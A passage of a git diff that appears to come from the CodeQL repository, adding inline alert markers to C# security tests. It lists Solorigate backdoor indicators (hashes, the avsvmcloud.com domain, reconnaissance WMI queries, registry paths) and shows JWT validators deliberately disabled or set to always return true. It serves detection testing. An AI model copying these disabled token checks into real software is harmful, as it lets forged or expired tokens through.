10296494671777307979, - 10336842116636872171, 10374841591685794123, 10393903804869831898, - 10463926208560207521, 10484659978517092504, 10501212300031893463, - 10545868833523019926, 10657751674541025650, 106672141413120087, 10734127004244879770, - 10829648878147112121, 1099511628211, 11073283311104541690, 1109067043404435916, - 11109294216876344399, 11266044540366291518, 11385275378891906608, - 11771945869106552231, 11801746708619571308, 11818825521849580123, - 11913842725949116895, 12027963942392743532, 12094027092655598256, - 12343334044036541897, 12445177985737237804, 12445232961318634374, - 12574535824074203265, 12679195163651834776, 12709986806548166638, - 12718416789200275332, 12785322942775634499, 12790084614253405985, - 12969190449276002545, 13014156621614176974, 13029357933491444455, - 13135068273077306806, 13260224381505715848, 13316211011159594063, - 13464308873961738403, 13544031715334011032, 13581776705111912829, - 13599785766252827703, 13611051401579634621, 13611814135072561278, - 13655261125244647696, 1367627386496056834, 1368907909245890092, 13693525876560827283, - 13783346438774742614, 13799353263187722717, 13825071784440082496, - 13852439084267373191, 13876356431472225791, 14055243717250701608, - 14079676299181301772, 14095938998438966337, 14111374107076822891, - 14193859431895170587, 14226582801651130532, 14243671177281069512, - 14256853800858727521, 14480775929210717493, 14482658293117931546, - 14513577387099045298, 14630721578341374856, 14695981039346656037, - 14710585101020280896, 1475579823244607677, 14868920869169964081, 14968320160131875803, - 14971809093655817917, 15039834196857999838, 15092207615430402812, - 15114163911481793350, 15194901817027173566, 15267980678929160412, - 15457732070353984570, 15514036435533858158, 15535773470978271326, - 15587050164583443069, 155978580751494388, 15695338751700748390, 15997665423159927228, - 16066522799090129502, 16066651430762394116, 16112751343173365533, - 16130138450758310172, 1614465773938842903, 16292685861617888592, 16335643316870329598, - 16423314183614230717, 16570804352575357627, 1682585410644922036, 16858955978146406642, - 16990567851129491937, 17017923349298346219, 17097380490166623672, - 17109238199226571972, 17204844226884380288, 17291806236368054941, - 17351543633914244545, 17439059603042731363, 17574002783607647274, - 17624147599670377042, 17633734304611248415, 17683972236092287897, - 17849680105131524334, 17939405613729073960, 17956969551821596225, - 17978774977754553159, 17984632978012874803, 17997967489723066537, - 18147627057830191163, 18150909006539876521, 18159703063075866524, - 18246404330670877335, 18294908219222222902, 18392881921099771407, - 18446744073709551613, 191060519014405309, 2032008861530788751, 2128122064571842954, - 2147483647, 2147745794, 2380224015317016190, 2478231962306073784, - 2532538262737333146, 2589926981877829912, 2597124982561782591, 2600364143812063535, - 2717025511528702475, 2734787258623754862, 27407921587843457, 2760663353550280147, - 2797129108883749491, 2810460305047003196, 292198192373389586, 2934149816356927366, - 3045986759481489935, 3178468437029279937, 3200333496547938354, 3320026265773918739, - 3320767229281015341, 3341747963119755850, 3407972863931386250, 3413052607651207697, - 3413886037471417852, 3421197789791424393, 3421213182954201407, 3425260965299690882, - 3538022140597504361, 3575761800716667678, 3588624367609827560, 3626142665768487764, - 3642525650883269872, 3656637464651387014, 3660705254426876796, 3769837838875367802, - 3778500091710709090, 3796405623695665524, 3869935012404164040, 3890769468012566366, - 3890794756780010537, 397780960855462669, 4030236413975199654, 4088976323439621041, - 4454255944391929578, 4501656691368064027, 4578480846255629462, 4821863173800309721, - 4931721628717906635, 506634811745884560, 5132256620104998637, 5183687599225757871, - 521157249538507889, 5219431737322569038, 541172992193764396, 5415426428750045503, - 5449730069165757263, 5587557070429522647, 5614586596107908838, 576626207276463000, - 5942282052525294911, 5945487981219695001, 5984963105389676759, 607197993339007484, - 6088115528707848728, 6116246686670134098, 6180361713414290679, 6195833633417633900, - 6274014997237900919, 640589622539783622, 6461429591783621719, 6491986958834001955, - 6508141243778577344, 6605813339339102567, 682250828679635420, 6827032273910657891, - 6943102301517884811, 700598796416086955, 7080175711202577138, 7175363135479931834, - 7315838824213522000, 7412338704062093516, 7516148236133302073, 7574774749059321801, - 7701683279824397773, 7775177810774851294, 7810436520414958497, 7878537243757499832, - 79089792725215063, 7982848972385914508, 8052533790968282297, 8129411991672431889, - 8146185202538899243, 835151375515278827, 8381292265993977266, 8408095252303317471, - 8473756179280619170, 8478833628889826985, 8612208440357175863, 8697424601205169055, - 8698326794961817906, 8709004393777297355, 8727477769544302060, 8760312338504300643, - 8799118153397725683, 8873858923435176895, 8994091295115840290, 9007106680104765185, - 9061219083560670602, 9149947745824492274, 917638920165491138, 9234894663364701749, - 9333057603143916814, 9384605490088500348, 9531326785919727076, 9555688264681862794, - 9559632696372799208, 9903758755917170407 + 10063651499895178962, 10235971842993272939, 10296494671777307979, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 10336842116636872171, 10374841591685794123, 10393903804869831898, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 10463926208560207521, 10484659978517092504, 10501212300031893463, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 10545868833523019926, 10657751674541025650, 106672141413120087, 10734127004244879770, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 10829648878147112121, 1099511628211, 11073283311104541690, 1109067043404435916, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 11109294216876344399, 11266044540366291518, 11385275378891906608, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 11771945869106552231, 11801746708619571308, 11818825521849580123, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 11913842725949116895, 12027963942392743532, 12094027092655598256, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 12343334044036541897, 12445177985737237804, 12445232961318634374, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 12574535824074203265, 12679195163651834776, 12709986806548166638, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 12718416789200275332, 12785322942775634499, 12790084614253405985, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 12969190449276002545, 13014156621614176974, 13029357933491444455, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13135068273077306806, 13260224381505715848, 13316211011159594063, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13464308873961738403, 13544031715334011032, 13581776705111912829, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13599785766252827703, 13611051401579634621, 13611814135072561278, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13655261125244647696, 1367627386496056834, 1368907909245890092, 13693525876560827283, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13783346438774742614, 13799353263187722717, 13825071784440082496, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13852439084267373191, 13876356431472225791, 14055243717250701608, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14079676299181301772, 14095938998438966337, 14111374107076822891, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14193859431895170587, 14226582801651130532, 14243671177281069512, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14256853800858727521, 14480775929210717493, 14482658293117931546, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14513577387099045298, 14630721578341374856, 14695981039346656037, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14710585101020280896, 1475579823244607677, 14868920869169964081, 14968320160131875803, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14971809093655817917, 15039834196857999838, 15092207615430402812, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 15114163911481793350, 15194901817027173566, 15267980678929160412, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 15457732070353984570, 15514036435533858158, 15535773470978271326, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 15587050164583443069, 155978580751494388, 15695338751700748390, 15997665423159927228, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 16066522799090129502, 16066651430762394116, 16112751343173365533, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 16130138450758310172, 1614465773938842903, 16292685861617888592, 16335643316870329598, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 16423314183614230717, 16570804352575357627, 1682585410644922036, 16858955978146406642, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 16990567851129491937, 17017923349298346219, 17097380490166623672, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17109238199226571972, 17204844226884380288, 17291806236368054941, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17351543633914244545, 17439059603042731363, 17574002783607647274, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17624147599670377042, 17633734304611248415, 17683972236092287897, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17849680105131524334, 17939405613729073960, 17956969551821596225, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17978774977754553159, 17984632978012874803, 17997967489723066537, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 18147627057830191163, 18150909006539876521, 18159703063075866524, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 18246404330670877335, 18294908219222222902, 18392881921099771407, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 18446744073709551613, 191060519014405309, 2032008861530788751, 2128122064571842954, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 2147483647, 2147745794, 2380224015317016190, 2478231962306073784, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 2532538262737333146, 2589926981877829912, 2597124982561782591, 2600364143812063535, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 2717025511528702475, 2734787258623754862, 27407921587843457, 2760663353550280147, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 2797129108883749491, 2810460305047003196, 292198192373389586, 2934149816356927366, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3045986759481489935, 3178468437029279937, 3200333496547938354, 3320026265773918739, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3320767229281015341, 3341747963119755850, 3407972863931386250, 3413052607651207697, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3413886037471417852, 3421197789791424393, 3421213182954201407, 3425260965299690882, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3538022140597504361, 3575761800716667678, 3588624367609827560, 3626142665768487764, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3642525650883269872, 3656637464651387014, 3660705254426876796, 3769837838875367802, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3778500091710709090, 3796405623695665524, 3869935012404164040, 3890769468012566366, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3890794756780010537, 397780960855462669, 4030236413975199654, 4088976323439621041, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 4454255944391929578, 4501656691368064027, 4578480846255629462, 4821863173800309721, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 4931721628717906635, 506634811745884560, 5132256620104998637, 5183687599225757871, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 521157249538507889, 5219431737322569038, 541172992193764396, 5415426428750045503, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 5449730069165757263, 5587557070429522647, 5614586596107908838, 576626207276463000, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 5942282052525294911, 5945487981219695001, 5984963105389676759, 607197993339007484, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 6088115528707848728, 6116246686670134098, 6180361713414290679, 6195833633417633900, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 6274014997237900919, 640589622539783622, 6461429591783621719, 6491986958834001955, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 6508141243778577344, 6605813339339102567, 682250828679635420, 6827032273910657891, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 6943102301517884811, 700598796416086955, 7080175711202577138, 7175363135479931834, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 7315838824213522000, 7412338704062093516, 7516148236133302073, 7574774749059321801, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 7701683279824397773, 7775177810774851294, 7810436520414958497, 7878537243757499832, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 79089792725215063, 7982848972385914508, 8052533790968282297, 8129411991672431889, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 8146185202538899243, 835151375515278827, 8381292265993977266, 8408095252303317471, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 8473756179280619170, 8478833628889826985, 8612208440357175863, 8697424601205169055, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 8698326794961817906, 8709004393777297355, 8727477769544302060, 8760312338504300643, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 8799118153397725683, 8873858923435176895, 8994091295115840290, 9007106680104765185, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 9061219083560670602, 9149947745824492274, 917638920165491138, 9234894663364701749, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 9333057603143916814, 9384605490088500348, 9531326785919727076, 9555688264681862794, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 9559632696372799208, 9903758755917170407 // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] }; } void Literals() { string[] literals = { // BUG : NumberOfKnownLiteralsAboveThreshold - "(?i)([^a-z]|^)(test)([^a-z]|$)", "(?i)(solarwinds)", "[{0,5}] {1,-16} {2}\t{3,5} {4}\\{5}\n", - "[{0,5}] {1}\n", "[E] {0} {1} {2}", - "\"\\{[0-9a-f-]{36}\\}\"|\"[0-9a-f]{32}\"|\"[0-9a-f]{16}\"", ".CortexPlugin", ".Orion", - "\"EventName\":\"EventManager\",", "\"EventType\":\"Orion\",", - "\\OrionImprovement\\SolarWinds.OrionImprovement.exe", - "0123456789abcdefghijklmnopqrstuvwxyz-_.", "\"sessionId\":\"{0}\",", "\"steps\":[", - "\"Succeeded\":true,", "\"Timestamp\":\"\\/Date({0})\\/\",", "\"userId\":\"{0}\",", - "{0} {1} HTTP/{2}\n", "10140", "144.86.226.0", "154.118.140.0", "172.16.0.0", "18.130.0.0", - "184.72.0.0", "192.168.0.0", "199.201.117.0", "20.140.0.0", "20100", "20220", "217.163.7.0", - "224.0.0.0", "240.0.0.0", "255.240.0.0", "255.254.0.0", "255.255.248.0", "3.0.0.382", - "41.84.159.0", "43140", "4320", "43260", "524287", "583da945-62af-10e8-4902-a8f205c72b2e", - "65280", "71.152.53.0", "74.114.24.0", "8.18.144.0", "87.238.80.0", "96.31.172.0", "983040", - "99.79.0.0", "Administrator", "advapi32.dll", "Apollo", "appsync-api", "avsvmcloud.com", - "api.solarwinds.com", "-root", "-cert", "-universal_ca", "-ca", "-primary_ca", "-timestamp", - "-global", "-secureca", "CloudMonitoring", "MACAddress", "DHCPEnabled", "DHCPServer", - "DNSHostName", "DNSDomainSuffixSearchOrder", "DNSServerSearchOrder", "IPAddress", "IPSubnet", - "DefaultIPGateway", "OSArchitecture", "InstallDate", "Organization", "RegisteredUser", - "fc00::", "fe00::", "fec0::", "ffc0::", "ff00::", "HKCC", "HKCR", "HKCU", "HKDD", - "HKEY_CLASSES_ROOT", "HKEY_CURRENT_CONFIG", "HKEY_CURRENT_USER", "HKEY_DYN_DATA", - "HKEY_LOCAL_MACHINE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", - "HKEY_PERFOMANCE_DATA", "HKEY_USERS", "HKLM", "HKPD", "HKU", "If-None-Match", - "Microsoft-CryptoAPI/", "Nodes", "Volumes", "Interfaces", "Components", "opensans", - "Organization", "OSArchitecture", "ParentProcessID", "PathName", "ReportWatcherPostpone", - "ReportWatcherRetry", "S-1-5-", "SeRestorePrivilege", "SeShutdownPrivilege", - "SeTakeOwnershipPrivilege", "SolarWinds", "SolarWindsOrionImprovementClient/", - "SourceCodePro", "SourceHanSans", "SourceHanSerif", "SourceSerifPro", "Start", "swip/Events", - "swip/upd/", "swip/Upload.ashx", "SYSTEM", "SYSTEM\\CurrentControlSet\\services", "us-east-1", - "us-east-2", "us-west-2", "fonts/woff/{0}-{1}-{2}{3}.woff2", - "fonts/woff/{0}-{1}-{2}-webfont{3}.woff2", "ph2eifo3n5utg1j8d94qrvbmk0sal76c", - "pki/crl/{0}{1}{2}.crl", "rq3gsalt6u1iyfzop572d49bnx8cvmkewhj", - "Select * From Win32_NetworkAdapterConfiguration where IPEnabled=true", - "Select * From Win32_OperatingSystem", "Select * From Win32_Process", - "Select * From Win32_SystemDriver", "Select * From Win32_UserAccount" + "(?i)([^a-z]|^)(test)([^a-z]|$)", "(?i)(solarwinds)", "[{0,5}] {1,-16} {2}\t{3,5} {4}\\{5}\n", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "[{0,5}] {1}\n", "[E] {0} {1} {2}", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "\"\\{[0-9a-f-]{36}\\}\"|\"[0-9a-f]{32}\"|\"[0-9a-f]{16}\"", ".CortexPlugin", ".Orion", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "\"EventName\":\"EventManager\",", "\"EventType\":\"Orion\",", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "\\OrionImprovement\\SolarWinds.OrionImprovement.exe", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "0123456789abcdefghijklmnopqrstuvwxyz-_.", "\"sessionId\":\"{0}\",", "\"steps\":[", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "\"Succeeded\":true,", "\"Timestamp\":\"\\/Date({0})\\/\",", "\"userId\":\"{0}\",", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "{0} {1} HTTP/{2}\n", "10140", "144.86.226.0", "154.118.140.0", "172.16.0.0", "18.130.0.0", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "184.72.0.0", "192.168.0.0", "199.201.117.0", "20.140.0.0", "20100", "20220", "217.163.7.0", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "224.0.0.0", "240.0.0.0", "255.240.0.0", "255.254.0.0", "255.255.248.0", "3.0.0.382", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "41.84.159.0", "43140", "4320", "43260", "524287", "583da945-62af-10e8-4902-a8f205c72b2e", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "65280", "71.152.53.0", "74.114.24.0", "8.18.144.0", "87.238.80.0", "96.31.172.0", "983040", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "99.79.0.0", "Administrator", "advapi32.dll", "Apollo", "appsync-api", "avsvmcloud.com", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "api.solarwinds.com", "-root", "-cert", "-universal_ca", "-ca", "-primary_ca", "-timestamp", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "-global", "-secureca", "CloudMonitoring", "MACAddress", "DHCPEnabled", "DHCPServer", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "DNSHostName", "DNSDomainSuffixSearchOrder", "DNSServerSearchOrder", "IPAddress", "IPSubnet", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "DefaultIPGateway", "OSArchitecture", "InstallDate", "Organization", "RegisteredUser", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "fc00::", "fe00::", "fec0::", "ffc0::", "ff00::", "HKCC", "HKCR", "HKCU", "HKDD", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "HKEY_CLASSES_ROOT", "HKEY_CURRENT_CONFIG", "HKEY_CURRENT_USER", "HKEY_DYN_DATA", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "HKEY_LOCAL_MACHINE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "HKEY_PERFOMANCE_DATA", "HKEY_USERS", "HKLM", "HKPD", "HKU", "If-None-Match", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Microsoft-CryptoAPI/", "Nodes", "Volumes", "Interfaces", "Components", "opensans", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Organization", "OSArchitecture", "ParentProcessID", "PathName", "ReportWatcherPostpone", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "ReportWatcherRetry", "S-1-5-", "SeRestorePrivilege", "SeShutdownPrivilege", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "SeTakeOwnershipPrivilege", "SolarWinds", "SolarWindsOrionImprovementClient/", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "SourceCodePro", "SourceHanSans", "SourceHanSerif", "SourceSerifPro", "Start", "swip/Events", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "swip/upd/", "swip/Upload.ashx", "SYSTEM", "SYSTEM\\CurrentControlSet\\services", "us-east-1", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "us-east-2", "us-west-2", "fonts/woff/{0}-{1}-{2}{3}.woff2", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "fonts/woff/{0}-{1}-{2}-webfont{3}.woff2", "ph2eifo3n5utg1j8d94qrvbmk0sal76c", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "pki/crl/{0}{1}{2}.crl", "rq3gsalt6u1iyfzop572d49bnx8cvmkewhj", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Select * From Win32_NetworkAdapterConfiguration where IPEnabled=true", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Select * From Win32_OperatingSystem", "Select * From Win32_Process", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Select * From Win32_SystemDriver", "Select * From Win32_UserAccount" // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] }; } @@ -286,7 +286,7 @@ void SwallowExceptionTest() Literals(); } catch // BUG : SwallowEverythingExceptionHandler - {} + {} // $ Alert[cs/solorigate/swallow-everything-exception] try{ Literals(); @@ -294,7 +294,7 @@ void SwallowExceptionTest() catch( Exception e) // BUG : SwallowEverythingExceptionHandler { // - } + } // $ Alert[cs/solorigate/swallow-everything-exception] try{ Literals(); diff --git a/csharp/ql/integration-tests/all-platforms/standalone/DatabaseQualityDiagnostics.qlref b/csharp/ql/integration-tests/all-platforms/standalone/DatabaseQualityDiagnostics.qlref index 6ff2dbd1d5f5..5d28fb2ecf9a 100644 --- a/csharp/ql/integration-tests/all-platforms/standalone/DatabaseQualityDiagnostics.qlref +++ b/csharp/ql/integration-tests/all-platforms/standalone/DatabaseQualityDiagnostics.qlref @@ -1 +1 @@ -Telemetry/DatabaseQualityDiagnostics.ql \ No newline at end of file +query: Telemetry/DatabaseQualityDiagnostics.ql diff --git a/csharp/ql/integration-tests/all-platforms/standalone_buildless_option/DatabaseQualityDiagnostics.qlref b/csharp/ql/integration-tests/all-platforms/standalone_buildless_option/DatabaseQualityDiagnostics.qlref index 6ff2dbd1d5f5..5d28fb2ecf9a 100644 --- a/csharp/ql/integration-tests/all-platforms/standalone_buildless_option/DatabaseQualityDiagnostics.qlref +++ b/csharp/ql/integration-tests/all-platforms/standalone_buildless_option/DatabaseQualityDiagnostics.qlref @@ -1 +1 @@ -Telemetry/DatabaseQualityDiagnostics.ql \ No newline at end of file +query: Telemetry/DatabaseQualityDiagnostics.ql diff --git a/csharp/ql/test/experimental/CWE-918/RequestForgery.expected b/csharp/ql/test/experimental/CWE-918/RequestForgery.expected index d0e8e0281f84..54c478d94373 100644 --- a/csharp/ql/test/experimental/CWE-918/RequestForgery.expected +++ b/csharp/ql/test/experimental/CWE-918/RequestForgery.expected @@ -3,6 +3,6 @@ edges nodes | RequestForgery.cs:12:52:12:54 | url : String | semmle.label | url : String | | RequestForgery.cs:14:66:14:68 | access to parameter url | semmle.label | access to parameter url | -subpaths problems | RequestForgery.cs:14:66:14:68 | access to parameter url | RequestForgery.cs:12:52:12:54 | url : String | RequestForgery.cs:14:66:14:68 | access to parameter url | The URL of this request depends on a $@. | RequestForgery.cs:12:52:12:54 | url | user-provided value | +subpaths diff --git a/csharp/ql/test/experimental/CWE-918/RequestForgery.qlref b/csharp/ql/test/experimental/CWE-918/RequestForgery.qlref index 3d529ae5a2ca..d4f3819dbac4 100644 --- a/csharp/ql/test/experimental/CWE-918/RequestForgery.qlref +++ b/csharp/ql/test/experimental/CWE-918/RequestForgery.qlref @@ -1 +1,2 @@ -experimental/CWE-918/RequestForgery.ql \ No newline at end of file +query: experimental/CWE-918/RequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.qlref b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.qlref index 527ea9259733..2c6cebb2dfc9 100644 --- a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.qlref +++ b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.qlref @@ -1 +1,2 @@ -experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.ql \ No newline at end of file +query: experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegation-test.cs b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegation-test.cs index 01af41c4b0c0..03a903a4f4be 100644 --- a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegation-test.cs +++ b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegation-test.cs @@ -98,8 +98,8 @@ public void TestCase01() SaveSigninToken = true }; - tokenValidationParamsBaseline.LifetimeValidator = (notBefore, expires, securityToken, validationParameters) => ValidateLifetimeAlwaysTrue(securityToken, validationParameters); // BUG delegated-security-validations-always-return-true - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => true; // BUG delegated-security-validations-always-return-true + tokenValidationParamsBaseline.LifetimeValidator = (notBefore, expires, securityToken, validationParameters) => ValidateLifetimeAlwaysTrue(securityToken, validationParameters); // BUG delegated-security-validations-always-return-true // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => true; // BUG delegated-security-validations-always-return-true // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] tokenValidationParamsBaseline.TokenReplayValidator = (DateTime? expirationTime, string securityToken, TokenValidationParameters validationParameters) => // GOOD { if (securityToken is null) @@ -112,11 +112,11 @@ public void TestCase01() tokenValidationParamsBaseline.LifetimeValidator = (notBefore, expires, securityToken, validationParameters) => ValidateLifetime02(securityToken, validationParameters); // GOOD tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => {return securityToken is null?false:true; }; // GOOD - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return true; }; // BUG - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => !false ; // BUG - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return securityToken is null?true:true; }; // BUG - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return ValidateLifetimeAlwaysTrue(securityToken, validationParameters);}; //BUG - tokenValidationParamsBaseline.AudienceValidator = (audiences, securityToken, validationParameters) => ValidateLifetimeAlwaysTrue(securityToken, validationParameters); //BUG + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return true; }; // BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => !false ; // BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return securityToken is null?true:true; }; // BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return ValidateLifetimeAlwaysTrue(securityToken, validationParameters);}; //BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (audiences, securityToken, validationParameters) => ValidateLifetimeAlwaysTrue(securityToken, validationParameters); //BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] } diff --git a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled-test.cs b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled-test.cs index 505aba41416f..57c5d51527f1 100644 --- a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled-test.cs +++ b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled-test.cs @@ -28,13 +28,13 @@ public void TestCase01() ClockSkew = TimeSpan.FromMinutes(5), ValidateActor = false, ValidateIssuerSigningKey = false, - ValidateIssuer = false, // BUG - ValidateAudience = false, // BUG - ValidateLifetime = false, // BUG - RequireExpirationTime = false, // BUG + ValidateIssuer = false, // BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] + ValidateAudience = false, // BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] + ValidateLifetime = false, // BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] + RequireExpirationTime = false, // 